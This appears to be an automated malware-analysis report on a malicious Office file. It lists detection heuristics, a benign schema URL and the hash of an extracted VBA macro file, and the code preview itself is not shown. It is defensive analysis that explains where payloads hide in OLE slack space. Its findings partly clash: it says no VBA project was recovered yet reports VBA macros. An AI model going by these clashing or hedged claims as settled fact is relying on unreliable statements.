Malware Insights
The sample is a malicious Office document containing VBA macros, indicated by the OLE_VBA_MACROS heuristic. The presence of the OLE_LEGACY_WORDBASIC_AUTOEXEC heuristic suggests an attempt to automatically execute code upon opening. The VBA script, though obfuscated, likely aims to download and execute a second-stage payload, as suggested by string concatenation patterns that appear to form URLs or commands. The large slack space in the OLE structure (OLE_SLACK_ANOMALY) is also a common characteristic of packed or obfuscated malicious documents.
Heuristics (4)
- OLE document has large unaccounted-for region (severity: high, OLE_SLACK_ANOMALY): OLE file is 101,888 bytes but its declared streams total only 22,859 bytes; 79,029 bytes (78%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- Legacy WordBasic auto-exec macro marker (severity: medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- VBA macros detected (severity: medium, OLE_VBA_MACROS): Document contains VBA macro code.
- Embedded URL (severity: info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9521 bytes |

SHA-256 of macros.bas: a0e6025246ced225e604e6b2d437fa3930afb29bb42243ecfb109c1a21992632
Preview script: first 1,000 lines of the extracted script (truncated).